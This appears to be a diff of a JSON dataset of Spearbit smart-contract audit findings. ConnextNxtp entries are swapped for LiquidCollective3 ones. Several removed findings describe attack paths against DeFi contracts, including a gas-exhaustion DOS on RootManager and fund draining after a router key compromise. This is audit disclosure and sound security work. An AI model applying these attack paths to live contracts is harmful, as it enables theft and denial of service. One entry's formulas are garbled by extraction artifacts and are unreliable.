renounceOwnership. The owner of the contract can use this method to give up their ownership, thereby leaving the contract without an owner. If that were to happen, it would not be possible to perform any owner-specific functionality on that contract anymore. The following is a summary of the affected contracts and their impact if the ownership has been renounced. 12 One of the most significant impacts is that Connext's message system cannot recover after a fraud has been resolved since there is no way to unpause and add the connector back to the system. Instance 2 - Renouncing admin role All the contracts that extend from ProposedOwnableFacet inherit a method called revokeRole. 1. Assume that the Owner has renounced its power and the only Admin remaining used revokeRole to re- nounce its Admin role. 2. Now the contract is left with Zero Owner & Admin. 3. All swap operations collect adminFees via SwapUtils.sol contract. In absence of any Admin & Owner, these fees will get stuck in the contract with no way to retrieve them. Normally it would have been withdrawn using withdrawSwapAdminFees|SwapAdminFacet.sol. 4. This is simply one example, there are multiple other critical functionalities impacted once both Admin and Owner revoke their roles.", + "title": "postUnderlyingBalanceIncludingExits and preUnderlyingBalanceIncludingExits can be removed from setConsensusLayerData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Both postUnderlyingBalanceIncludingExits ( Bpost ) and preUnderlyingBalanceIncludingEx- its ( Bpre ) include the accumulated skimmed and exited amounts overtime which part of them might have exited the protocol through redeeming (or skimmed back to CL and penalized). Their delta is almost the same as the delta of vars.postReportUnderlyingBalance and vars.preReportUnderlyingBalance (almost if one adds a check for non-decreases of validator counts). u u : postUnderlyingBalanceIncludingExits u : preUnderlyingBalanceIncludingExits u (cid:0) Bpre u : vars.postReportUnderlyingBalance : vars.preReportUnderlyingBalance : Breport,post (cid:0) Breport,pre u u Bpost u Bpre (cid:1)Bu: Bpost Breport,post Breport,pre u (cid:1)Breport u Bprev v : u Bcurr v (cid:1)Bv : Bcurr Bprev s Bcurr s (cid:1)Bs: Bcurr Bprev e Bcurr e (cid:1)Be: Bcurr previous reported/stored value for total validator balances in CL LastConsensusLayerRe- port.get().validatorsBalance v (cid:0) Bprev v (can be negative) : current reported value of total validator balances in CL report.validatorsBalance : LastConsensusLayerReport.get().validatorsSkimmedBalance : report.validatorsSkimmedBalance s (cid:0) Bprev s (always non-negative, this is an invariant that gets checked). : LastConsensusLayerReport.get().validatorsExitedBalance : report.validatorsExitedBalance e (cid:0) Bprev e (always non-negative, this is an invariant that gets checked). $C{prev} $: LastConsensusLayerReport.get().validatorsCount Ccurr : report.validatorsCount (cid:1)C: Ccurr (cid:0) Cprev (this value should be non-negative, note this invariant has not been checked in the code- base) Cdeposit : DepositedValidatorCount.get() Bd : BalanceToDeposit.get() 22 Bc: CommittedBalance.get() Br : BalanceToRedeem.get() Note that the above values are assumed to be in their form before the current report gets stored in the storage. Then we would have Bpost u = Bcurr v + Bcurr s + Bcurr e = Bpre u + (cid:1)Bv + (cid:1)Bs + (cid:1)Be (cid:0) 32(cid:1)C and so: (cid:1)Bu = (cid:1)Bv + (cid:1)Bs + (cid:1)Be (cid:0) 32(cid:1)C = (cid:1)Breport u", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "No way of removing Fraudulent Roots", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Fraudulent Roots cannot be removed once fraud is detected by the Watcher. This means that Fraud Roots will be propogated to each chain.", + "title": "The formula or the parameter names for calculating currentMaxDailyCommittableAmount can be made more clear", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "currentMaxDailyCommittableAmount is calculated using the below formula: // we compute the max daily committable amount by taking the asset balance without the balance to deposit into account ,! uint256 currentMaxDailyCommittableAmount = LibUint256.max( dcl.maxDailyNetCommittableAmount, (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - ,! currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX ); Therefore its value is the maximum of two potential maximum values.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Large number of inbound roots can DOS the RootManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "It is possible to perform a DOS against the RootManager by exploiting the dequeueVerified function or insert function of the RootManager.sol. The following describes the possible attack path: 1. Assume that a malicious user calls the permissionless GnosisSpokeConnector.send function 1000 times (or any number of times that will cause an Out-of-Gas error later) within a single transaction/block on Gnosis causing a large number of Gnosis's outboundRoots to be forwarded to GnosisHubConnector on Ethereum. 2. Since the 1000 outboundRoots were sent at the same transaction/block earlier, all of them should arrive at the GnosisHubConnector within the same block/transaction on Ethereum. 13 3. For each of the 1000 outboundRoots received, the GnosisHubConnector.processMessage function will be triggered to process it, which will in turn call the RootManager.aggregate function to add the received out- boundRoot into the pendingInboundRoots queue. As a result, 1000 outboundRoots with the same commit- Block will be added to the pendingInboundRoots queue. 4. After the delay period, the RootManager.propagate function will be triggered. The function will call the dequeueVerified function to dequeue 1000 verified outboundRoots from the pendingInboundRoots queue by looping through the queue. This might result in an Out-of-Gas error and cause a revert. 5. If the above dequeueVerified function does not revert, the RootManager.propagate function will attempt to insert 1000 verified outboundRoots to the aggregated Merkle tree, which might also result in an Out-of-Gas error and cause a revert. If the RootManager.propagate function reverts when called, the latest aggregated Merkle root cannot be forwarded to the spokes. As a result, none of the messages can be proven and processed on the destination chains. Note: the processing on the Hub (which is on mainnet) can also become very expensive, as the mainnet usually as a far higher gas cost than the Spoke.", + "title": "preExitingBalance is a rough estimate for signalling the number of validators to request to exit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "exitingBalance and preExitingBalance might be trying to compensate for the same portion of balance (non-stopped validators which have been signaled to exit and are in the CL exit queue). That means the number of validatorCountToExit calculated to accommodate for the redeem demand is actually lower than what is required. The important portion of preExitingBalance is for the validators that were singled to exit in the previous reporting round but the operators have not registered them for exit in CL. Also totalStoppedValidatorCount can include slashed validator counts which again lowers the required validatorCountToExit and those values should not be accounted for here. Perhaps the oracle members should also report the slashing counts of validators so that one can calculate these values more accurately.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Missing mirrorConnector check on Optimism hub connector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "processMessageFromRoot() calls _processMessage() to process messages for the \"fast\" path. But _processMessage() can also be called by the AMB in the slow path. The second call to _processMessage() is not necessary (and could double process the message, which luckily is prevented via the processed[] mapping). The second call (from the AMB directly to _processMessage()) also doesn't properly verify the origin of the message, which might allow the insertion of fraudulent messages. 14 function processMessageFromRoot(...) ... { ... _processMessage(abi.encode(_data)); ... } function _processMessage(bytes memory _data) internal override { // sanity check root length require(_data.length == 32, \"!length\"); // get root from data bytes32 root = bytes32(_data); if (!processed[root]) { // set root to processed processed[root] = true; // update the root on the root manager IRootManager(ROOT_MANAGER).aggregate(MIRROR_DOMAIN, root); } // otherwise root was already sent to root manager }", + "title": "More documentation can be added regarding the currentMaxDailyCommittableAmount calculation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "currentMaxDailyCommittableAmount calculated as // we compute the max daily committable amount by taking the asset balance without the balance to deposit into the account ,! uint256 currentMaxDailyCommittableAmount = LibUint256.max( dcl.maxDailyNetCommittableAmount, (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - ,! currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX ); We can add further to the comment: Since before the _commitBalanceToDeposit hook is called we have skimmed the remaining to redeem balance to BalanceToDeposit, underlyingAssetBalance - currentBalanceToDeposit represent the funds allocated for CL (funds that are already in CL, funds that are in transit to CL or funds committed to be deposited to CL). It is important that the redeem balance is already skimmed for this upper bound calculation, so for future code changes we should pay attention to the order of hook callbacks otherwise the upper bounds would be different.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Add _mirrorConnector to _sendMessage of BaseMultichain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _sendMessage() of BaseMultichain sends the message to the address of the _amb. This doesn't seem right as the first parameter is the target contract to interact with according to multichain cross- chain. This should probably be the _mirrorConnector. function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable ... ); }", + "title": "BalanceToRedeem is only non-zero during a report processing transaction", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "BalanceToRedeem is only ever posses a non-zero value during the report processing when a quorum has been made for the oracle member votes (setConsensusLayerData). And at the very end of this process its value gets reset back to 0.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Unauthorized access to change acceptanceDelay", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The acceptanceDelay along with supportedInterfaces[] can be set by any user without the need of any Authorization once the init function of DiamondInit has been called and set. This is happening since caller checks (LibDiamond.enforceIsContractOwner();) are missing for these fields. Since acceptanceDelay defines the time post which certain action could be executed, setting a very large value could DOS the system (new owner cannot be set) and setting very low value could make changes without consid- eration time (Setting/Renounce Admin, Disable whitelisting etc at ProposedOwnableFacet.sol )", + "title": "Improve clarity on bufferRebalancingMode variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "According to the documentation, the bufferRebalancingMode flag passed by the oracle should allow or disallow the rebalancing of funds between the Deposit and Redeem buffers. The flag correctly disables rebalancing in the DepositBuffer to RedeemBuffer direction as can be seen here if (depositToRedeemRebalancingAllowed && availableBalanceToDeposit > 0) { uint256 rebalancingAmount = LibUint256.min( availableBalanceToDeposit, redeemManagerDemandInEth - exitingBalance - availableBalanceToRedeem ); if (rebalancingAmount > 0) { availableBalanceToRedeem += rebalancingAmount; _setBalanceToRedeem(availableBalanceToRedeem); _setBalanceToDeposit(availableBalanceToDeposit - rebalancingAmount); } } but it is not used at all when pulling funds in another way // if funds are left in the balance to redeem, we move them to the deposit balance _skimExcessBalanceToRedeem();", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Messages destined for ZkSync cannot be processed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "For ZkSync chain, L2 to L1 communication is free, but L1 to L2 communication requires a certain amount of ETH to be supplied to cover the base cost of the transaction (including the _l2Value) + layer 2 operator tip. The _sendMessage function of ZkSyncHubConnector.sol relies on the IZkSync(AMB).requestL2Transaction function to send messages from L1 to L2. However, the requestL2Transaction call will always fail because no ETH is supplied to the transaction (msg.value is zero). As a result, the ZkSync's hub connector on Ethereum cannot forward the latest aggregated Merkle root to the ZkSync's spoke connector on ZkSync chain. Thus, any message destined for ZkSync chain cannot be processed since incoming messages cannot be proven without the latest aggregated Merkle root. 16 function _sendMessage(bytes memory _data) internal override { // Should always be dispatching the aggregate root require(_data.length == 32, \"!length\"); // Get the calldata bytes memory _calldata = abi.encodeWithSelector(Connector.processMessage.selector, _data); // Dispatch message // [v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#structure](https://v2-docs.zksync.io/d ,! ev/developer-guides/Bridging/l1-l2.html#structure) // calling L2 smart contract from L1 Example contract // note: msg.value must be passed in and can be retrieved from the AMB view function ,! `l2TransactionBaseCost` c // [v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#using-contract-interface-in-your-proje ct](https://v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#using-contract-interface-in- your-project) c c ,! ,! IZkSync(AMB).requestL2Transaction{value: msg.value}( // The address of the L2 contract to call mirrorConnector, // We pass no ETH with the call 0, // Encoding the calldata for the execute _calldata, // Ergs limit 10000, // factory dependencies new bytes[]0 ); } Additionally, the ZkSync's hub connector contract needs to be loaded with ETH so that it can forward the appro- priate amount of ETH when calling the ZkSync's requestL2Transaction. However, it is not possible to do so because no receive(), fallback or payable function has been implemented within the contract and its parent contracts for accepting ETH.", + "title": "Fix code style consistency issues", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "There is a small code styling mismatch between the new code under audit and the style used through the rest of the code. Specifically, function parameter names are supposed to be prepended with _ to differentiate them from variables defined in the function body.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Cross-chain messaging via Multichain protocol will fail", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Multichain v6 is supported by Connext for cross-chain messaging. The _sendMessage function of BaseMultichain.sol relies on Multichain's anyCall for cross-chain messaging. Per the Anycall V6 documentation, a gas fee for transaction execution needs to be paid either on the source or destination chain when an anyCall is called. However, the anyCall is called without consideration of the gas fee within the connectors, and thus the anyCall will always fail. Since Multichain's hub and spoke connectors are unable to send messages, cross-chain messaging using Multichain within Connext will not work. 17 function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable _data, address(0), // fallback address on origin chain MIRROR_CHAIN_ID, 0 // fee paid on origin chain ); } Additionally, for the payment of the execution gas fee, a project can choose to implement either of the following methods: Pay on the source chain by depositing the gas fee to the caller contracts. Pay on the destination chain by depositing the gas fee to Multichain's anyCall contract at the destination chain. If Connext decides to pay the gas fee on the source chain, they would need to deposit some ETH to the connector contracts. However, it is not possible because no receive(), fallback or payable function has been implemented within the contracts and their parent contracts for accepting ETH.", + "title": "Remove unused constants", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "DENOMINATION_OFFSET is unused and can be removed from the codebase.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "_domainSeparatorV4() not updated after name/symbol change", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The BridgeToken allows updating the name and symbol of a token. However the _CACHED_DOMAIN_- SEPARATOR (of EIP712) isn't updated. This means that permit(), which uses _hashTypedDataV4() and _CACHED_- DOMAIN_SEPARATOR, still uses the old value. On the other hand DOMAIN_SEPARATOR() is updated. Both and especially their combination can give unexpected results. BridgeToken.sol function setDetails(string calldata _newName, string calldata _newSymbol) external override onlyOwner { // careful with naming convention change here token.name = _newName; token.symbol = _newSymbol; emit UpdateDetails(_newName, _newSymbol); } OZERC20.sol 18 function DOMAIN_SEPARATOR() external view override returns (bytes32) { // See {EIP712._buildDomainSeparator} return keccak256( abi.encode(_TYPE_HASH, keccak256(abi.encode(token.name)), _HASHED_VERSION, block.chainid, ,! address(this)) ); } function permit(...) ... { ... bytes32 _hash = _hashTypedDataV4(_structHash); ... } draft-EIP712.sol import \"./EIP712.sol\"; EIP712.sol function _hashTypedDataV4(bytes32 structHash) internal view virtual returns (bytes32) { return ECDSA.toTypedDataHash(_domainSeparatorV4(), structHash); } function _domainSeparatorV4() internal view returns (bytes32) { if (address(this) == _CACHED_THIS && block.chainid == _CACHED_CHAIN_ID) { return _CACHED_DOMAIN_SEPARATOR; } else { return _buildDomainSeparator(_TYPE_HASH, _HASHED_NAME, _HASHED_VERSION); } }", + "title": "Document what TotalRequestedExits can potentially represent", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Documentation is lacking for TotalRequestedExits. This parameter represents a quantity that is a mix of exited (or to be exited) and slashed validators for an operator. Also, in general, this is a rough quantity since we don't have a finer reporting of slashed and exited validators (they are reported as a sum).", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "diamondCut() allows re-execution of old updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once diamondCut() is executed, ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _- init, _calldata))] is not reset to zero. This means the contract owner can rerun the old updates again without any delay by executing diamondCut() function. Assume the following: diamondCut() function is executed to update the facet selector with version_2 A bug is found in ver- sion_2 and it is rolled back Owner can still execute diamondCut() function which will again update the facet selector to version 2 since ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] is still valid", + "title": "Operators need to listen to RequestedValidatorExits and exit their validators accordingly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Operators need to listen to RequestedValidatorExits and exit their validators accordingly emit RequestedValidatorExits(operators[idx].index, requestedExits + operators[idx].picked); Note that requestedExits + operators[idx].picked represents the upper bound for the index of the funded validators that need to be exited by the operator.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "User may not be able to override slippage on destination", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "If BridgeFacet.execute() is executed before BridgeFacet.forceUpdateSlippage(), user won't be able to update slippage on the destination chain. In this case, the slippage specified on the source chain is used. Due to different conditions on these chains, a user may want to specify different slippage values. This can result in user loss, as a slippage higher than necessary will result the swap trade being sandwiched.", + "title": "Oracle members would need to listen to ClearedReporting and report their data if necessary", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Oracle members would need to listen to ClearedReporting event and report their data if necessary", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Do not rely on token balance to determine when cap is reached", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Connext Diamond defines a cap on each token. Any transfer making the total token balance more than the cap is reverted. uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } Anyone can send tokens to Connext Diamond to artificially increase the custodied amount since it depends on the token balance. This can be an expensive attack but it can become viable if price of a token (including next assets) drops.", + "title": "The only way for an oracle member to change its report data for an epoch is to reset the reporting process by changing its address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "If an oracle member has made a mistake in its CL report to the Oracle or for some other reason would like to change its report, it would not be able to due to the following if block: // we retrieve the voting status of the caller, and revert if already voted if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(report.epoch, msg.sender); } The only way for the said oracle member to be able to report different data is to reset its address by calling setMember. This would cause all the report variants and report positions to be cleared and force all the other oracle members to report their data again. Related: Any oracle member can censor almost quorum report variants by resetting its address.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Router recipient can be configured more than once", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The comments from the setRouterRecipient function mentioned that the router should only be able to set the recipient once. Otherwise, no problem is solved. However, based on the current implementation, it is possible for the router to set its recipient more than once. /** File: RoutersFacet.sol 394: 395: 396: 397: 398: 399: 400: 401: * @notice Sets the designated recipient for a router * @dev Router should only be able to set this once otherwise if router key compromised, * no problem is solved since attacker could just update recipient * @param router Router address to set recipient * @param recipient Recipient Address to set to router */ function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { Let's assume that during router setup, the setupRouter function is being called and the owner is set to Alice's first EOA (0x123), and the recipient is set to Alice's second EOA (0x456). Although the comment mentioned that the setRouterRecipient should only be set once, this is not true because this function will only revert if the _- prevRecipient == recipient. As long as the new recipient is not the same as the previous recipient, the function will happily accept the new recipient. Therefore, if the router's signing key is compromised by Bob (attacker), he could call the setRouterRecipient function to change the new recipient to his personal EOA and drain the funds within the router. The setRouterRecipient function is protected by onlyRouterOwner modifier. Since Bob's has the compromised router's signing key, he will be able to pass this validation check. 21 /** File: RoutersFacet.sol 157: 158: 159: 160: 161: 162: 163: 164: 165: _; } * @notice Asserts caller is the router owner (if set) or the router itself */ modifier onlyRouterOwner(address _router) { address owner = s.routerPermissionInfo.routerOwners[_router]; if (!((owner == address(0) && msg.sender == _router) || owner == msg.sender)) revert RoutersFacet__onlyRouterOwner_notRouterOwner(); The second validation is at Line 404, which checks if the new recipient is not the same as the previous recipient. The recipient variable is set to Bob's EOA wallet, while _prevRecipient variable is set to Alice's second EOA (0x456). Therefore, the condition at Line 404 is False, and it will not revert. So Bob successfully set the recipient to his EOA at Line 407. File: RoutersFacet.sol 401: 402: 403: 404: 405: 406: 407: function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { // Check recipient is changing address _prevRecipient = s.routerPermissionInfo.routerRecipients[router]; if (_prevRecipient == recipient) revert RoutersFacet__setRouterRecipient_notNewRecipient(); // Set new recipient s.routerPermissionInfo.routerRecipients[router] = recipient; Per the Github discussion, the motivation for such a design is the following: If a routers signing key is compromised, the attacker could drain the liquidity stored on the contract and send it to any specified address. This effectively means the key is in control of all unused liquidity on chain, which prevents router operators from adding large amounts of liquidity directly to the contract. Routers should be able to delegate the safe withdrawal address of any unused liquidity, creating a separation of concerns between router key and liquidity safety. In summary, the team is trying to create a separation of concerns between router key and liquidity safety. With the current implementation, there is no security benefit of segregating the router owner role and recipient role unless the router owner has been burned (e.g. set to address zero). Because once the router's signing key is compromised, the attacker can change the recipient anyway. The security benefits of separation of concerns will only be achieved if the recipient can truly be set only once.", + "title": "For a quorum making CL report the epoch restrictions are checked twice.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "When an oracle member reports to the Oracle's reportConsensusLayerData, the requirements for a valid epoch is checked once in reportConsensusLayerData: // checks that the report epoch is not invalid if (!river.isValidEpoch(report.epoch)) { revert InvalidEpoch(report.epoch); } and once again in setConsensusLayerData // we start by verifying that the reported epoch is valid based on the consensus layer spec if (!_isValidEpoch(cls, report.epoch)) { revert InvalidEpoch(report.epoch); } Note that only the Oracle can call the setConsensusLayerData endpoint and the only time the Oracle makes this call is when the quorum is reached in reportConsensusLayerData.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "The set of tokens in an internal swap pool cannot be updated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter) the _pooledTo- kens or the set of tokens used in this stable swap pool cannot be updated. Now the s.swapStorages[_key] pools are used in other facets for assets that have the hash of their canonical token id and canonical domain equal to _key, for example when we need to swap between a local and adopted asset or when a user provides liquidity or interact with other external endpoints of StableSwapFacet. If the submitted set of tokens to this pool _pooledTokens beside the local and adopted token corresponding to _key include some other bad/malicious tokens, users' funds can be at risk in the pool in question. If this happens, we need to pause the protocol, push an update, and initializeSwap again.", + "title": "Clear report variants and report position data during the migration to the new contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Upon migration to the new contract with a new type of reporting data the old report positions and variants should be cleared by calling _clearReports() on the new contract or an older counterpart on the old contract. Note that the report variants slot will be changed from: bytes32(uint256(keccak256(\"river.state.reportsVariants\")) - 1) to: bytes32(uint256(keccak256(\"river.state.reportVariants\")) - 1)", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, - { - "title": "An incorrect decimal supplied to initializeSwap for a token cannot be corrected", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter) the decimal precisions per tokens, and therefore tokenPrecisionMultipliers cannot be changed. If the supplied decimals also include a wrong value, it would cause incorrect calculation when a swap is being made and currently there is no update mechanism for tokenPrecisionMultipliers nor a mechanism for removing the swapStorages[_key].", + { + "title": "Remove unused functions from Oracle", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The following functions are unused and can be removed from the Oracle's implementation isValidEpoch getTime getExpectedEpochId getLastCompletedEpochId getCurrentEpochId getCLSpec getCurrentFrame getFrameFirstEpochId getReportBounds", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Presence of delegate not enforced", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A delegate address on the destination chain can be used to fix stuck transactions by changing the slippage limits and by re-executing transactions. However, the presence of a delegate address isn't checked in _xcall(). Note: set to medium risk because tokens could get lost 23 function forceUpdateSlippage(TransferInfo calldata _params, uint256 _slippage) external ,! onlyDelegate(_params) { ... } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { (bytes32 transferId, DestinationTransferStatus status) = _executeSanityChecks(_args); ... } function _executeSanityChecks(ExecuteArgs calldata _args) private view returns (bytes32, ,! DestinationTransferStatus) { // If the sender is not approved relayer, revert if (!s.approvedRelayers[msg.sender] && msg.sender != _args.params.delegate) { revert BridgeFacet__execute_unapprovedSender(); } }", + "title": "RedeemManager. _claimRedeemRequests - Consider adding the recipient to the revert message in case of failure", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The purpose of the _claimRedeemRequests function is to facilitate the claiming of ETH on behalf of another party who has a valid redeem request. It is worth noting that if any of the calls to recipients fail, the entire transaction will revert. Although it is impossible to conduct a denial-of-service (DoS) attack in this scenario, as the worst-case scenario only allows the transaction sender to specify a different array of redeemRequestIds, it may still be challenging to determine the specific redemption request that caused the transaction to fail.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Relayer could lose funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The xReceive function on the receiver side can contain unreliable code which Relayer is unaware of. In the future, more relayers will participate in completing the transaction. Consider the following scenario: 1. Say that Relayer A executes the xReceive function on receiver side. 2. In the xReceive function, a call to withdraw function in a foreign contract is made where Relayer A is holding some balance. 3. If this foreign contract is checking tx.origin (say deposit/withdrawal were done via third party), then Relayer A's funds will be withdrawn without his permission (since tx.origin will be the Relayer).", + "title": "Exit validator picking strategy does not consider slashed validator between reported epoch and current epoch", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The current picking strategy in the OperatorsRegistry._pickNextValidatorsToExitFromActive- Operators function relies on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed and so the strategy might pick and signal to the operators those validators that have been slashed. As a result, the suggested number of validators to exit the protocol to compensate for the redemption demand in the next round of reports might not be exactly what was requested. Similarly, the OperatorsV2._hasExitableKeys function only evaluates based on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed. Thus, some returned operators might not have exitable keys in the current epoch.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Medium Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "TypedMemView.sameType does not use the correct right shift value to compare two bytes29s", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function sameType should shift 2 x 12 + 3 bytes to access the type flag (TTTTTTTTTT) when comparing it to 0. This is due to the fact that when using bytes29 type in bitwise operations and also comparisons to 0, a paramater of type bytes29 is zero padded from the right so that it fits into a uint256 under the hood. 0x TTTTTTTTTT AAAAAAAAAAAAAAAAAAAAAAAA LLLLLLLLLLLLLLLLLLLLLLLL 00 00 00 Currently, sameType only shifts the xored value 2 x 12 bytes so the comparison compares the type flag and the 3 leading bytes of memory address in the packing specified below: // First 5 bytes are a type flag. // - ff_ffff_fffe is reserved for unknown type. // - ff_ffff_ffff is reserved for invalid types/errors. // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The function is not used in the codebase but can pose an important issue if incorporated into the project in the future. function sameType(bytes29 left, bytes29 right) internal pure returns (bool) { return (left ^ right) >> (2 * TWELVE_BYTES) == 0; }", + "title": "Duplicated functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "_getStoppedValidatorsCountFromRawArray functions are the same. Operator.2._getStoppedValidatorCountAtIndex The and OperatorsRegistry.1. 30 function _getStoppedValidatorCountAtIndex(uint32[] storage stoppedValidatorCounts, uint256 if (index + 1 >= stoppedValidatorCounts.length) { return 0; } return stoppedValidatorCounts[index + 1]; function _getStoppedValidatorsCountFromRawArray(uint32[] storage stoppedValidatorCounts, internal view returns 